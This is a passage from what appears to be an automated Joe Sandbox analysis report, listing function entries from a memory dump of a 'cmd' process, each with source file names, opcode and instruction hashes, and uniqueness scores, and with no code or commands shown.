                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 957f80fe12a3183fec81f3b6599abfb079ebedba2ff896b2aa332de993ab993d
                                                                        • Instruction ID: f705d43ddc519dbe4aee9defebc9a4db166944d4c211d522438307e773613748
                                                                        • Opcode Fuzzy Hash: 957f80fe12a3183fec81f3b6599abfb079ebedba2ff896b2aa332de993ab993d
                                                                        • Instruction Fuzzy Hash: BD119D356046209BCB15CF89C4C0A6AF7E9AF8E710B198079ED089F289D7F2D9018B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313AAEE Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction ID: 8e7ebd91faf29b397d7f3ef4627f1ec542412f75f536d692c5b183e33bd5769a
                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction Fuzzy Hash: E0219D76610A40DFC735CF49C540A66FBE6EF8AB10F19847EE88A9B618C731EC41CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031080E9 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55d6ab7ac0b74ec1ba6d84661e1e1ce45cca7c540bc200ca2f3f9bd91d856978
                                                                        • Instruction ID: 29e8ab1b4073a63b44c452c36848c4efcb7286ca0e833d68dd8a6367e36f67a4
                                                                        • Opcode Fuzzy Hash: 55d6ab7ac0b74ec1ba6d84661e1e1ce45cca7c540bc200ca2f3f9bd91d856978
                                                                        • Instruction Fuzzy Hash: A9216D75A04206DFCB18CF98C581AAEBBB6FF89318F24416DD105AB350CBB1AD46CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313674D Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dbf8b40d219f1888f525d447691ed5d236ca71cdc3a9cd2e2ec68552bdf01d72
                                                                        • Instruction ID: 2bb8cee10c9365b00b5e54b6fd945e345fff4332d910a85b318ea7b881c45b9a
                                                                        • Opcode Fuzzy Hash: dbf8b40d219f1888f525d447691ed5d236ca71cdc3a9cd2e2ec68552bdf01d72
                                                                        • Instruction Fuzzy Hash: 29216075600B00EFD724DF69C881F66B7F8FF89250F54882DE59AC7250DB70A850CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031366B0 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c62d770b6b6b937fa589aa19aa424f6d3bef07c356a5f088898d2889b6a11689
                                                                        • Instruction ID: 500bc23aca1c9ece574558cb7b1165bcdb210a9a2a84495b8a0a317c5b290d13
                                                                        • Opcode Fuzzy Hash: c62d770b6b6b937fa589aa19aa424f6d3bef07c356a5f088898d2889b6a11689
                                                                        • Instruction Fuzzy Hash: 7511E07AA01204EFCB28DF59C5C1A5ABBF9EF8D650B5A407AD805DB310D730ED00CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03100AD0 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction ID: f7f2fdfeecb25ad3e7b669e86e73dd16d9d7ff357bdf1c01e8032fd46cf24a48
                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction Fuzzy Hash: 2021F4B5A00B059FD3A0CF29D440B52BBF4FB4CB10F10492AE88ACBB40E371E854CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318E7E1 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction ID: dc48c6e56da216421f4143f441bb39e05d2ea3b4bf0d6507dee339f8b710ce65
                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction Fuzzy Hash: 21117336A00600EFD725EF45C844B5EB7A6EF4A754F098828F9499B160D771DD80DFE8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031227ED Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c456d8a5fb674476b46abbc8185a52776cc2584cd059cc5e16509a4fb06bdf04
                                                                        • Instruction ID: 32c0f9afa5a33950e9e878671cbfe170e42fac24503d34be27b4142c8fdc4ab5
                                                                        • Opcode Fuzzy Hash: c456d8a5fb674476b46abbc8185a52776cc2584cd059cc5e16509a4fb06bdf04
                                                                        • Instruction Fuzzy Hash: 000108752056846FE316E6699C44F6B6ACCEF8D3A0F090475F9009B151D724DC11C2B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03104690 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e528a20c7b829c3b7b18b3c4764c83fa8a5fdb437790482e22c4e93cca5e0149
                                                                        • Instruction ID: 66b1e94fb7cd3a9e6d89d81ce42367f1c9609a84f79d61ae1a52ec8f2e147a77
                                                                        • Opcode Fuzzy Hash: e528a20c7b829c3b7b18b3c4764c83fa8a5fdb437790482e22c4e93cca5e0149
                                                                        • Instruction Fuzzy Hash: F911C23A201744AFCB35DF5BD980F56BBA9EB8E764F054125FA148B290CBB0E850CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D4B00 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e21b1eaaf4e8dc3dd07883936585c507726388f05e1f930980809e51cfa2996f
                                                                        • Instruction ID: 69eab16a59972c17cd96406b6db97adf3e67bfa30be4091ac13457d87133a8a6
                                                                        • Opcode Fuzzy Hash: e21b1eaaf4e8dc3dd07883936585c507726388f05e1f930980809e51cfa2996f
                                                                        • Instruction Fuzzy Hash: F211C6362006109FDB25DB2AD880F66F7A6FFDA720F194429E5968B654DF30A802CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03136620 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 497faad2e6a265a5061d9d47710abeceaeb4e70d2784f1fe75345454709382fa
                                                                        • Instruction ID: 3a2fa3a969b3e50de764908da0ca74d54f4d0815748872847273de5892116846
                                                                        • Opcode Fuzzy Hash: 497faad2e6a265a5061d9d47710abeceaeb4e70d2784f1fe75345454709382fa
                                                                        • Instruction Fuzzy Hash: 1D11E5B6A40714BBDB21EF59C9C0B9EF7B9EF8D780F540459D901AB240D770AD018B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312EA2E Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12ec58e587f6a54182a68b26cbbd422044943fa6ab7e89be8513dd5a4387066f
                                                                        • Instruction ID: 3aa63b3dc1c8f0e358e30a604121d83914f47b856612fb6cbe1a4a95892026fc
                                                                        • Opcode Fuzzy Hash: 12ec58e587f6a54182a68b26cbbd422044943fa6ab7e89be8513dd5a4387066f
                                                                        • Instruction Fuzzy Hash: 8901B5755012089FC719DF15D544F56BBFEEF8E314F25816AE1098B264C7B0EC95CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312E53E Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction ID: 22b714a2bfccae3b2bfd510a90a307f37e2e57e495b347251996692b94dba186
                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction Fuzzy Hash: AF110C7A2126D19FDB22D758ED44B657BD8EF08754F1E04F0ED418B641E328C8A3C260
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318E75D Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction ID: e7ba27629954facdb639e7ef8de2a73c1e74f2081ff69ec2d4442ba83c1324dc
                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction Fuzzy Hash: 56019236600205AFD725EF58CC00F5ABAAAEB89750F098424E9059B260E772DD90CFE8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FA250 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction ID: 90fcc99469185b65870eca504baf114ee77c10a5ff33a764d93b1cc6b51c5aed
                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction Fuzzy Hash: 7B01C871716B119FCBB0CF19D84096ABBE9EB45770704896DF9998BA80D731D420CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D4940 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5da45a8485d20c8b95252c931bd379aee1740f66f670ec1cc4cacfcd864c1fdf
                                                                        • Instruction ID: 8419f2087adc2f9380072ca6eba1cee4d9f08e69added792ca6a2f434e4230ba
                                                                        • Opcode Fuzzy Hash: 5da45a8485d20c8b95252c931bd379aee1740f66f670ec1cc4cacfcd864c1fdf
                                                                        • Instruction Fuzzy Hash: 880149325452009FC739DF1BC840E52B7ACEB8E370B294265E96A9B195DF30EC01CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03106259 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab5897006d02e89164175db61a8ca9340d8490743cd0c3de209602ca8c1b639b
                                                                        • Instruction ID: 71ca1e20814b27da0267dbf24d82f99d046240a01317c01858ce15825e1f7855
                                                                        • Opcode Fuzzy Hash: ab5897006d02e89164175db61a8ca9340d8490743cd0c3de209602ca8c1b639b
                                                                        • Instruction Fuzzy Hash: F4115E74641218ABDB25EB64CC41FE9B378EF0C710F5045E4B318AA0E0D7709E91CF84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317E1D0 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5b60dd443f4c65e629ab76c0c3660e49a0e81aaae38d795753cf8b4b8303313
                                                                        • Instruction ID: ef44202636ab9e8d55d7d7a4186935697b638009a80c5ef8175323a773b85c58
                                                                        • Opcode Fuzzy Hash: e5b60dd443f4c65e629ab76c0c3660e49a0e81aaae38d795753cf8b4b8303313
                                                                        • Instruction Fuzzy Hash: 7A11793A241740EFCB25EF19C980F56BBB8FB48B44F2404A5E9059B6A1C735ED01CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03186050 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4fd504eb83b675d0cadf57440842b6a5de2eb2434ad9d3da7a0a8a7db6ce5af0
                                                                        • Instruction ID: 657304a95381bb783d97121028e014fe3a7d9f5e1275cfd240c7d6deb90c8314
                                                                        • Opcode Fuzzy Hash: 4fd504eb83b675d0cadf57440842b6a5de2eb2434ad9d3da7a0a8a7db6ce5af0
                                                                        • Instruction Fuzzy Hash: D4111776900119ABCB16EB94CC80DDFBB7DEF48254F054166A906E7210EB34EA54CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310208A Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction ID: d0e0abd64029a7fc616d01707ff02f5b82403414e30946e53d54dd19de4e61fe
                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction Fuzzy Hash: 06012836200310CBDF14DB29D984F96B76ABFCC710F5A49A5EC158F289DBB1C882C390
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03196500 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a306c1ab145c9c4ba36c35a0573f7ce25de8b5998eda7bfa952cd60e8a815c93
                                                                        • Instruction ID: b8099b73516f08f25ac44791b78b3220c8c3be4ed2b8d9dcb4c142ecb7ae0cb8
                                                                        • Opcode Fuzzy Hash: a306c1ab145c9c4ba36c35a0573f7ce25de8b5998eda7bfa952cd60e8a815c93
                                                                        • Instruction Fuzzy Hash: B511A5766441459FE714CF58D800BA5FBBAFB5A354F09815AE8448B315D731EC80CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AEA60 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19389590688c4ecb8a0e20b3d461f8e3c755251470e5e0c82f483d97adbd5291
                                                                        • Instruction ID: 6108517177703817badf77a366c008ba5a99ce57543a939fb64582f52a5ea207
                                                                        • Opcode Fuzzy Hash: 19389590688c4ecb8a0e20b3d461f8e3c755251470e5e0c82f483d97adbd5291
                                                                        • Instruction Fuzzy Hash: 2A01D83D1406109FCB35EB198440DB6BBBAFF49651B09587EE1545F610C731EC42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

